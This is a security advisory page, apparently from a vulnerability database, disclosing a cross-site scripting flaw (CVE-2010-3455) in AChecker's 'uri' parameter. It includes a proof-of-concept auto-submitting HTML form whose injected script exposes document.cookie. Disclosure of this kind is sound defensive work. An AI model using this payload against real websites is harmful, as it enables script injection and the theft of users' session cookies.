Lucene search
High-Tech BridgeHTB22601HistorySep 01, 2010 - 12:00 a.m.
Cross-site Scripting (XSS) Vulnerability in AChecker
2010-09-0100:00:00
High-Tech Bridge
www.htbridge.com
29
0.002 Low
EPSS
Percentile
60.4%
High-Tech Bridge SA Security Research Lab has discovered vulnerability in AChecker which could be exploited to perform cross-site scripting attacks.
- Cross-site scripting (XSS) vulnerability in AChecker: CVE-2010-3455
The vulnerability exists due to input sanitation error in the “uri” parameter in index.php. A remote attacker can send a specially crafted HTTP POST request to the vulnerable script and execute arbitrary HTML and script code in user`s browser in context of the vulnerable website.
Exploitation example:
<form action=“http://host/index.php” method=“post” name=“main” enctype=“multipart/form-data” >
<input type=“hidden” name=“uri” value=‘http://1"><script>alert(document.cookie)</script>’ />
<input type=“hidden” name=“validate_uri” value=“Check It” />
<input type=“hidden” name=“MAX_FILE_SIZE” value=“52428800” />
<input type=“hidden” name=“uploadfile”; filename=“” />
<input type=“hidden” name=“gid[]” value=“8” />
</form>
<script>
document.main.submit();
</script>
Related
cve
cve
CVE-2010-3455
2010-09-17 20:00:01
cvelist
cvelist
CVE-2010-3455
2010-09-17 19:00:00
prion
prion
Cross site scripting
2010-09-17 20:00:00
nvd
nvd
CVE-2010-3455
2010-09-17 20:00:01